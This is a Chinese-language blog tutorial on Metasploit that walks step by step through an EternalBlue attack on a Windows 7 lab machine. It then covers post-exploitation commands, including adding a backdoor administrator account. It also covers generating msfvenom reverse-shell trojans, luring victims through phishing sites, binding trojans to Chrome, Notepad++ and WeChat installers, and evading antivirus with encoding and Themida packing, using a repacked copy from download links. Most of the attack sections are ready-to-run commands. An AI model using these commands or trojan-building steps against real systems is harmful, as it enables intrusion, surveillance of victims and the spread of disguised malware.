【P3】最强渗透工具 - metasploit(安装配置及使用教程详解)
包括 metasploit 是什么?、metasploit 攻击 windows 操作系统、metasploit 攻击永恒之蓝全流程、使用 Kali 渗透工具生成远控木马、metasploit 攻击示例、msfvenom 绕过杀毒软件技巧之捆绑木马、msfvenom 绕过杀毒软件技巧之加壳、windows 下安装 Themida、Themida 使用教程。
文章目录
包括 metasploit 是什么?、metasploit 攻击 windows 操作系统、metasploit 攻击永恒之蓝全流程、使用 Kali 渗透工具生成远控木马、metasploit 攻击示例、msfvenom 绕过杀毒软件技巧之捆绑木马、msfvenom 绕过杀毒软件技巧之加壳、windows 下安装 Themida、Themida 使用教程。
一、metasploit 是什么?
Kali 最强渗透工具 - metasploit
-
msf 是一款开源安全漏洞利用和测试工具,集成了各种平台上常见的溢出漏洞和流行的 shellcode,并持续保持更新
-
metasploit 让复杂的漏洞攻击流程变的非常简单,一个电脑小白经过几小时的学习,就能对操作系统等主流漏洞发起危害性攻击
二、metasploit 攻击 windows 操作系统
1、msfconsole:启动 metasploit 命令行 [命令行效率高,使用方便]
2、启动 metasploit 前需要做:
-
打开 kali 终端
-
使用 sudo su 命令,并输入 kali 的密码 kali,切换至 root 用户
-
使用 msfdb init 命令初始化 metasploit 数据库(*可选)
3、操作步骤:
(1)、sudo su 切换到超级管理员 root 用户,密码 kali(无 root 用户需自行创建一个)
- sudo su
(2)、msfconsole 启动 metasploit 命令行界面
- msfconsole
三、metasploit 攻击永恒之蓝全流程
永恒之蓝是指2017年4月14日晚,黑客团体Shadow Brokers(影子经纪人)公布一大批网络攻击工具,其中包含“永恒之蓝”工具,“永恒之蓝”利用Windows系统的SMB漏洞可以获取系统最高权限。5月12日,不法分子通过改造“永恒之蓝”制作了wannacry勒索病毒,英国、俄罗斯、整个欧洲以及中国国内多个高校校内网、大型企业内网和政府机构专网中招,被勒索支付高额赎金才能解密恢复文件
1、使用模块:use exploit/windows/smb/ms17_010_eternalblue
2、设置必选项:查看必选项 [*required 为 yes 的就是必选项] show options
3、操作步骤
(1)、可以使用编号进行搜索模块,永恒之蓝编号被微软定义为 ms17_010
- search ms17_010
- exploit:漏洞攻击脚本
如图,可以通过 Description 查看模块是干什么的
(2)、使用模块
两种方法:
-
use 模块名称
-
use 模块编号
(3)、配置(设置)模块,可以先查看有哪些设置,告诉 msf 攻击谁,要干啥
- show options
-
Required(必选项):只需要配置必选项为 yes 的即可
-
RHOSTS:地址
-
RPORT:端口,默认445
-
VERIFY_ARCH、VERIFY_TARGET:这两选项已经是配置好的,保持默认即可
-
Payload options:攻击载荷,默认 windows/x64/meterpreter/reverse_tcp:获取到目标机器的命令执行权限;攻击之后,你想干啥
-
EXITFUNC:默认已经配置好
-
LHOST:监听地址,攻击机的ip地址
-
LPORT:监听端口
(4)、启动靶机,win 7
-
靶机安装参考:https://blog.csdn.net/qq_45138120/article/details/131350059
-
靶机为 VMware 下的 Windows 虚拟机,Windows 版本无所谓
(5)、打开 cmd,使用 ipconfig 查看靶机 ip 地址
- ipconfig
(6)、kali 设置攻击靶机地址
- set RHOSTS 靶机ip
(7)、设置完毕后,可以再次使用 show options 查看是否配置齐全
- show options
如图:查看 Required 配置项为 yes 的 Current Setting 当前设置是否为空,不为空即配置完毕
(8)、可以修改下默认的 LHOST 端口
- set lport 22222
注:端口范围 0-65535
扩展:查看端口是否开放
① 查看445端口是否开启
- netstat -an
② 此处攻击靶机一定要关闭防火墙
(9)、运行模块
- run
如图,会自动进行攻击靶机,并且获取命名执行权限。攻击成功后,先打印 WIN 并进入 meterpreter
meterpreter:拿到了 Win 7 靶机的权限
(10)、可以使用 help 查看可以使用的命令
-
Command:命令
-
Description:命令的描述或解释
-
shutdown:关机
-
User interface Commands:用户接口命令
-
getdesktop:截图
-
keyscna:发送键盘指令
-
mouse:发送鼠标指令
(11)、退出
- exit
四、metasploit 攻击成功后能做什么
1、攻击成功后能做什么
-
meterpreter 是强大的后渗透模块,可以输入 help 查看帮助信息
-
远程控制、命令执行、摄像头监控、密码获取、创建后门用户、破坏篡改系统…这些看起来非常复杂又高级的操作都能用 meterpreter 中一行或几个字母,简单的命令完成
-
例:创建后门用户并开启远程连接
-
shell
-
net user zhangsan 123456 /add && net localgroup administrators zhangsan /add
-
exit
-
run getgui -e
-
2、使用 Kali 渗透工具生成远控木马
(1)、msfvenom 是用来生成后门的软件,在目标机上执行后门,在本地监听上线
-
venom:毒,毒液
-
[* msfvenom 在 shell 里使用,不是 msfconsole 终端]
(2)、windows 可执行程序后门:
msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.159.128 Iport=9999 -f exe -o demo.exe
-
msfvenom:执行使用的工具
-
-p:payload
-
windows/x64/meterpreter/reverse_tcp:payload_name 系统/架构/作用/方式;如果要攻击 Linux,将 windows 换成 Linux 即可(android,mac)
-
lhost=192.168.123.136 Iport=9999:payload设置(kali 地址,kali 端口)
-
-f:format
-
exe:exe,windows 可执行文件(ipk,jar,war)
-
-o:output,输入的文件名,如 demo.exe
4.1、操作步骤
(1)、生成木马文件
- msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.159.128 Iport=9999 -f exe -o demo.exe
(2)、如图,文件生成在当前路径下
-
可以使用 ls 进行查看
-
可以使用 pwd 查看工作目录的绝对路径
(3)、可以使用钓鱼网站等诱骗受害人点击
(4)、将木马下载到本地,demo.exe
拉取到本地时,一定要关闭杀毒软件
木马病毒下载到本地会被杀毒软件截取,后续需要让木马绕过杀毒软件
木马病毒不可以直接运行,就跟钓鱼一样,需要将木马放在鱼钩上
(5)、终端控制台进入 msfconsole
- msfconsole
(6)、使用 exploit/multi/handler 模块
- use exploit/multi/handler
(7)、查看设置
-
show options
-
可简写:options
- Payload options:攻击载荷设置(设置成生成可执行程序后门时设置的 playload_name)
(8)、设置攻击载荷设置(设置成生成可执行程序后门时设置的 playload_name)
- set payload windows/x64/meterpreter/reverse_tcp
(9)、设置 kali 地址
- set lhost 192.168.159.128
(10)、设置端口(设置成生成可执行程序后门时设置的 Iport,必须一致)
- set lport 9999
(11)、可以使用 options 再次查看设置信息
(12)、运行
- run
现在鱼钩已经扔河里了,等待鱼儿上钩,有两种方法:1、将鱼儿摁在勾上,利用漏洞;2、姜太公钓鱼,愿者上钩。诱导鱼儿上钩
(13)、假如受害者上钩,双击本地的 deom.exe 文件
(14)、如图,受害者已上钩
- meterpreter:获取到受害者电脑的执行权限
(15)、输入 help,查看可以执行的命令操作
- help
4.2、攻击示例
(1)、webcam_list,查看受害者电脑是否有摄像头
- webcam_list
(2)、我使用的是台式机,所以没有摄像头
五、msfvenom 绕过杀毒软件技巧
最基础的免杀 [ 对于其他杀毒软件效果不同,具体情况请自行尝试]*
5.1、捆绑木马
msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.159.128 lport=9999 -f exe -x notepad++.exe -o notepad++.exe
msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.159.128 lport=9999 -f exe -x chrome.exe -o chrome.exe
msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.159.128 lport=9999 -f exe -x firefox.exe -o firefox.exe
msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.159.128 lport=9999 -f exe -o firefox.exe
- -x:模板(要使用哪一个正常程序的模板作为后门的生成)
注:如果 notepad++ 过不了,可以换其它软件;路径下必须存在可执行程序
- -e /指定编码方式对攻击载荷进行重新编码
- -x /指定木马捆绑在哪个可执行程序模板上
- -i /指定对目标进行编码的次数,多次编码理论上有助于免杀的实现
- -f /指定 msf 编码器输出程序的格式
- -o /指定处理完毕后的文件输出路径
注:使用捆绑木马时,路径下必须存在可执行程序
(1)、在生成木马的路径下,先复制一个可执行程序过去,比如:chrome.exe
(2)、使用 msfvenom 生成一个 Windows 环境下的木马,并捆绑到 chrome.exe 上生成 chrome01.exe 的合成马
- msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.159.128 lport=9999 -f exe -x chrome.exe -o chrome01.exe
其它示例:
- msfvenom -p windows/shell_reverse_tcp LHOST=192.168.111.132 LPORT=9999 -e x86/shikata_ga_nai -x WeChatSetup.exe -i 12 -f exe -o /root/WeChatSetup1.exe
x86/shikata_ga_nai 进行多次编码的方式进行免杀处理
(3)、在此路径下,可以看到生成一个 chrome01.exe 的木马
5.2、加壳:压缩壳、加密壳
5.2.1、Themida:加壳软件
5.2.1.1、Linux 下安装 Themida
-
Themida Linux下rar包 百度网盘下载链接:https://pan.baidu.com/s/1v6q8y0Xg-SXMUXX4roEyJg?pwd=8fr8
-
提取码:8fr8
注:此压缩包 rar包,必须在 Linux 系统下进行解压,使用需要在 windows 下使用
扩展:解压rar包
(1)、安装 rar 包教程参考:https://blog.csdn.net/weixin_40293999/article/details/122733513
(2)、解压rar包
5.2.1.2、windows 下安装 Themida
-
Themida windows下文件夹百度网盘下载链接:https://pan.baidu.com/s/1vGaNf92vzUZbsMlzMwXNFA?pwd=sfcx
-
提取码:sfcx
-
下载后得到名为 Themida_x32_x64_v3.0.4.0_Repacked 的文件夹
5.2.1.2、Themida 使用教程
注:Themida.exe为32位;Themida64.exe为64位
(1)、打开下载后的 Themida_x32_x64_v3.0.4.0_Repacked 文件夹,双击 Themida64.exe 执行文件
(2)、将未加壳的木马可执行程序拉到 Themida 软件中
- 也可以在 Themida 软件中选择导入的木马文件路径
(3)、点击 Protext 进行加壳
注:加壳前,先将杀毒软件关闭,等加壳完成后再打开
自动进行加壳保护,成功后,在本地会生成一个添加 Protext 名称的文件
(4)、如图,加壳完成,点击 Close 即可
更多推荐
所有评论(0)